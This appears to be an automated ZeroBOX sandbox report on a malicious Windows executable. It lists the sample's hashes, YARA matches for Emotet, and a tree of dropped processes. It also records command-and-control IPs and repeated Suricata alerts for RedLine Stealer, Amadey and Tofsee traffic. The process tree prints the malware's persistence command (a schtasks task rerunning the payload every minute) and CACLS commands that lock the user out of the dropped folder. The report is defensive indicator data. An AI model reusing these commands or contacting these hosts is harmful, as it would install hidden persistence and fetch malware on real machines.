Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	July 27, 2023, 10:24 a.m.	July 27, 2023, 10:26 a.m.

Size	514.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`f0c28816a58f907591e5e014e049024a`
SHA256	`6e22ff9b754474a7f3f48c2a3c56220bab09392c3c6befeb7e37e92172470b59`
CRC32	`FB28F566`
ssdeep	`12288:aMrBy90+O8FhnFGKNGBaJdxEDEGcKyIIzPa8BMd3:byBnbFGKNmSED7c1zC8yd3`
PDB Path	wextract.pdb
Yara	UPX_Zero - UPX packed file Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet CAB_file_format - CAB archive file Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet IsPE32 - (no description)

photo340.exe "C:\Users\test22\AppData\Local\Temp\photo340.exe"
1460
- v7696680.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\v7696680.exe
  2056
  - v7318670.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\v7318670.exe
    2124
    - a7207637.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\a7207637.exe
      2172
    - b6358658.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\b6358658.exe
      2596
      - pdates.exe "C:\Users\test22\AppData\Local\Temp\925e7e99c5\pdates.exe"
        2712
        
        schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN pdates.exe /TR "C:\Users\test22\AppData\Local\Temp\925e7e99c5\pdates.exe" /F
        2856
        
        cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "pdates.exe" /P "test22:N"&&CACLS "pdates.exe" /P "test22:R" /E&&echo Y|CACLS "..\925e7e99c5" /P "test22:N"&&CACLS "..\925e7e99c5" /P "test22:R" /E&&Exit
        2912
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        3008
        
        cacls.exe CACLS "pdates.exe" /P "test22:N"
        3052
        
        cacls.exe CACLS "pdates.exe" /P "test22:R" /E
        2136
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2104
        
        cacls.exe CACLS "..\925e7e99c5" /P "test22:N"
        2040
        
        cacls.exe CACLS "..\925e7e99c5" /P "test22:R" /E
        2572
        
        foto5566.exe "C:\Users\test22\AppData\Local\Temp\1000009051\foto5566.exe"
        2640
        
        x2150544.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\x2150544.exe
        2708
        
        g2474962.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\g2474962.exe
        2096
        
        h0472691.exe C:\Users\test22\AppData\Local\Temp\IXP002.TMP\h0472691.exe
        2896
        
        j6120486.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\j6120486.exe
        524
        
        fotod250.exe "C:\Users\test22\AppData\Local\Temp\1000010051\fotod250.exe"
        2220
        
        y3938954.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\y3938954.exe
        1696
        
        k7404811.exe C:\Users\test22\AppData\Local\Temp\IXP004.TMP\k7404811.exe
        748
        
        l7621037.exe C:\Users\test22\AppData\Local\Temp\IXP004.TMP\l7621037.exe
        3028
        
        n6056764.exe C:\Users\test22\AppData\Local\Temp\IXP003.TMP\n6056764.exe
        2140
        
        an.exe "C:\Users\test22\AppData\Local\Temp\1000011051\an.exe"
        2748
        
        ohcompetitive.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\ohcompetitive.exe
        2884
        
        raman.exe "C:\Users\test22\AppData\Local\Temp\1000012051\raman.exe"
        3044
        
        regsvr32.exe "C:\Windows\System32\regsvr32.exe" -U -S K1heT.2
        2060
        
        rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
        1692
  - c0646653.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\c0646653.exe
    2756
- d4021112.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\d4021112.exe
  2808
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
files.catbox.moe	A 108.181.20.35	108.181.20.35

IP Address	Status	Action
141.94.192.217	Active	Moloch
108.181.20.35	Active	Moloch
164.124.101.2	Active	Moloch
77.91.124.47	Active	Moloch
77.91.124.84	Active	Moloch
77.91.68.248	Active	Moloch
77.91.68.61	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49180 -> 77.91.124.84:19071	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49180 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.124.84:19071	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 192.168.56.103:49179 -> 77.91.68.61:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected
TCP 192.168.56.103:49179 -> 77.91.68.61:80	2045751	ET MALWARE Win32/Amadey Bot Activity (POST) M2	A Network Trojan was detected
TCP 77.91.124.84:19071 -> 192.168.56.103:49180	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 77.91.124.84:19071 -> 192.168.56.103:49180	2046056	ET MALWARE Redline Stealer Activity (Response)	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49185 -> 77.91.68.61:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49180 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49190 -> 77.91.68.61:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49181 -> 77.91.124.47:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 77.91.124.47:80 -> 192.168.56.103:49181	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.91.124.47:80 -> 192.168.56.103:49181	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 77.91.124.47:80 -> 192.168.56.103:49181	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49193 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49193 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49193 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49190 -> 77.91.68.61:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49198 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49198 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49201 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49201 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49198 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49201 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49203 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49203 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49203 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49181 -> 77.91.124.47:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 77.91.124.47:80 -> 192.168.56.103:49181	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 77.91.124.47:80 -> 192.168.56.103:49181	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49211 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49211 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49211 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49215 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49215 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49215 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49205 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49205 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49205 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49222 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49222 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49222 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49236 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49236 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49236 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49243 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49243 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49243 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49247 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49247 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49247 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49248 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49248 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49248 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49257 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49257 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49220 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49257 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49213 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49267 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49267 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49267 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49220 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49268 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49268 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49268 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49267 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49213 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49269 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49269 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49269 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49270 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49270 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49270 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49220 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49272 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49272 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49272 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49213 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49221 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49221 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49221 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49284 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49213 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49197 -> 77.91.124.84:19071	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49284 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49284 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49197 -> 77.91.124.84:19071	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49197 -> 77.91.124.84:19071	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 192.168.56.103:49216 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 77.91.124.84:19071 -> 192.168.56.103:49197	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49216 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49216 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49204 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49204 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49286 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49224 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49286 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49224 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49286 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49224 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49295 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49225 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49295 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49225 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49295 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49225 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49295 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49224 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49225 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49303 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49303 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49231 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49303 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49231 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49231 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49190 -> 77.91.68.61:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49235 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49235 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49235 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49230 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49230 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49336 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49336 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49230 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49237 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49336 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49237 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49237 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49337 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49337 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49239 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49239 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49246 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49337 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49246 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49239 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49246 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49340 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49340 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49249 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49250 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49249 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49340 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49250 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49249 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
